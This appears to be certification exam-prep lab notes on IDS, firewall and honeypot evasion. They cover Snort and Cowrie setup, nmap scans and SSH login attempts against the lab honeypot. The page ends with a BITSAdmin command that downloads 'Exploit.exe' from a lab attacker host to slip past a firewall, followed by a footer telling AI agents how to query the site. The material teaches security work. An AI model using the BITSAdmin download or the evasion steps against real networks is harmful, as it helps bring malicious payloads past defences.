# Module 12: Evading IDS, Firewalls , Honeypots

Ethical hackers or pen testers use numerous tools and techniques to evade the IDS and firewall on the target network. Recommended labs that will assist you in learning various evasion techniques include:

1. Perform intrusion detection using various tools
   * Detect intrusions using Snort
   * Deploy Cowrie honeypot to detect malicious network traffic
2. Evade ids/firewalls using various evasion techniques
   * Evade firewall through Windows BITSAdmin

## Lab 1: Perform Intrusion Detection using Various Tools <a href="#lab-1-perform-intrusion-detection-using-various-tools" id="lab-1-perform-intrusion-detection-using-various-tools"></a>

### Task 1: Detect Intrusions using Snort <a href="#task-1-detect-intrusions-using-snort" id="task-1-detect-intrusions-using-snort"></a>

#### 1. **Snort Installation:**

* **Launch the Windows 11 machine** and log in as `Admin` using `Pa$$w0rd`.
* Navigate to the Snort installation directory (`E:\CEH-Tools\CEHv13 Module 12\Intrusion Detection Tools\Snort`) and run the **Snort installer** (`Snort_2_9_15_Installe.x64.exe`).
* Accept the license agreement and follow the installation wizard to install Snort. The default install location is `C:\Snort`.

#### 2. **Copy Configuration Files:**

* Copy the necessary configuration files (e.g., `snort.conf`, `so_rules`, `preproc_rules`, and `rules` folders) from the provided location (`E:\CEH-Tools\...`) to `C:\Snort`.
* Replace any existing files in the `C:\Snort\etc` folder with the new ones.

#### 3. **Initial Snort Setup:**

* Open a **Command Prompt** and navigate to `C:\Snort\bin`.
* Run `snort` to initialize Snort and then use `snort -W` to list your network interfaces.
* Identify the Ethernet Driver index (e.g., `1`), and enable it using the command: `snort -dev -i 1`.

#### 4. **Test Snort:**

* Leave the Snort window running and open another command prompt.
* Run a **ping command** (`ping google.com`) from the same machine to trigger a Snort alert.
* Verify that Snort detects the ping probe and generates an alert.

#### 5. **Configure `snort.conf`:**

* Open the `snort.conf` file in **Notepad++**.
* **Modify network variables** in the `snort.conf` file:
  * Set `HOME_NET` to the IP address of the Windows 11 machine (e.g., `10.10.1.11`).
  * Leave `EXTERNAL_NET` as `any`.
  * Set other server variables (e.g., `DNS_SERVERS`, `SMTP_SERVERS`, etc.) as needed.
* Update `RULE_PATH`, `so_rules`, and `preproc_rules` to the correct paths (e.g., `C:\Snort\rules`).
* Configure dynamic preprocessor libraries with the correct paths.
* Comment out unnecessary preprocessor rules.
* Set output plugin paths for `classification.config` and `reference.config`.
* Replace `ipvar` with `var` to ensure proper configuration.

#### 6. **Enable Detection Rules:**

* Navigate to the `C:\Snort\rules` directory and **enable ICMP rules** by editing `icmp-info.rules`.
* Modify the rule to detect ICMP ping probes directed at the system (e.g., `alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.1.11`).

#### 7. **Run Snort in IDS Mode:**

* Run Snort using the command:

  ```mathematica
  mathematicaCopy codesnort -iX -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii
  ```

  Replace `X` with the Ethernet interface index (e.g., `1`).
* Snort starts in IDS mode, initializes, and waits for attacks.

#### 8. **Simulate an Attack:**

* Switch to the **Windows Server 2019 (Attacker machine)** and use the command:

  ```
  Copy codeping 10.10.1.11 -t
  ```

  (Replace `10.10.1.11` with the actual IP address of the Windows 11 machine).
* Snort on Windows 11 detects this ping and triggers an alert.

#### 9. **Check Snort Logs:**

* After Snort detects the attack, go to the **Snort log directory** (`C:\Snort\log\10.10.1.11`) and open the `ICMP_ECHO.ids` file.
* The log file contains entries of detected attacks.

#### 10. **Completion:**

* The Snort IDS successfully detected and logged the attack (ping), indicating that the setup was successful.
* Close all open windows on both machines.

***

### Task 2: Deploy Cowrie Honeypot to Detect Malicious Network Traffic <a href="#task-2-deploy-cowrie-honeypot-to-detect-malicious-network-traffic" id="task-2-deploy-cowrie-honeypot-to-detect-malicious-network-traffic"></a>

#### **1. Create Cowrie User and Prepare Environment:**

* **Login to Ubuntu**: Use `Ubuntu/toor` credentials.
* **Create a new user** `cowrie` (with no password) by running:

  ```css
  cssCopy codesudo adduser --disabled-password cowrie
  ```

  Follow the prompts and confirm.

#### **2. Access Cowrie Files:**

* **Navigate to CEH-Tools**: Open `Files` on the Ubuntu machine and copy the `cowrie` folder from the network share (`10.10.1.11/CEHv13 Module 12...`) to `/home/ubuntu`.
* If `ceh-tools` is not visible, **Connect to Server** (`smb://10.10.1.11`), enter credentials (`Admin/Pa$$w0rd`), and navigate to the `cowrie` folder.

#### **3. Install Dependencies:**

* Open a terminal and switch to **root user**:

  ```
  Copy codesudo su
  ```
* Navigate to `cowrie` directory and install dependencies:

  ```bash
  bashCopy codecd cowrie
  pip install --upgrade -r requirements.txt
  ```
* Change to `/home/ubuntu` and modify file permissions:

  ```bash
  bashCopy codechmod -R 777 cowrie
  ```

#### **4. Set Up Port Redirection:**

* **Redirect SSH traffic** (port 22) to Cowrie's port 2222 using `iptables`:

  ```css
  cssCopy codeiptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
  ```

#### **5. Configure Cowrie to Run on Port 22:**

* Use `authbind` to allow the `cowrie` user to bind to port 22:

  ```bash
  bashCopy codetouch /etc/authbind/byport/22
  chown cowrie:cowrie /etc/authbind/byport/22
  chmod 770 /etc/authbind/byport/22
  ```

#### **6. Create Virtual Environment:**

* Create and activate a Python virtual environment:

  ```bash
  bashCopy codevirtualenv --python=python3 cowrie-env
  source cowrie-env/local/bin/activate
  ```

#### **7. Start Cowrie Honeypot:**

* Navigate to the `cowrie` directory and start the honeypot:

  ```bash
  bashCopy codebin/cowrie start
  ```

#### **8. View Cowrie Logs:**

* Open the log file to check for incoming SSH connections:

  ```bash
  bashCopy codecd /var/log/cowrie/
  tail cowrie.log
  ```
* Ensure that the log shows: "Ready to accept SSH connections."

#### **9. Simulate Attacks from Parrot Security:**

* **Switch to Parrot Security machine** and run `nmap` to scan for open ports on the target:

  ```css
  cssCopy codenmap -p- -sV 10.10.1.9
  ```
* You should see **port 22** open, indicating the honeypot is running on this port.
* **Attempt SSH Brute-Force**: Use **PuTTY** to attempt SSH login (use `ubuntu/toor` or random credentials). The connection will be redirected to the Cowrie honeypot.

#### **10. Observe Attack in Cowrie Logs:**

* **Switch back to Ubuntu machine** and run:

  ```bash
  bashCopy codetail cowrie.log
  ```
* The log will capture the attacker’s SSH connection attempts and interactions.

***

## Lab 2: Evade IDS/Firewalls using Various Evasion Techniques <a href="#lab-2-evade-idsfirewalls-using-various-evasion-techniques" id="lab-2-evade-idsfirewalls-using-various-evasion-techniques"></a>

### Task 1: Evade Firewall through Windows BITSAdmin <a href="#task-1-evade-firewall-through-windows-bitsadmin" id="task-1-evade-firewall-through-windows-bitsadmin"></a>

```
bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ghoulsec.gitbook.io/ghoulsec-vault/exam-prep-notes/ceh-v13-master-edition/module-12-evading-ids-firewalls-honeypots.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.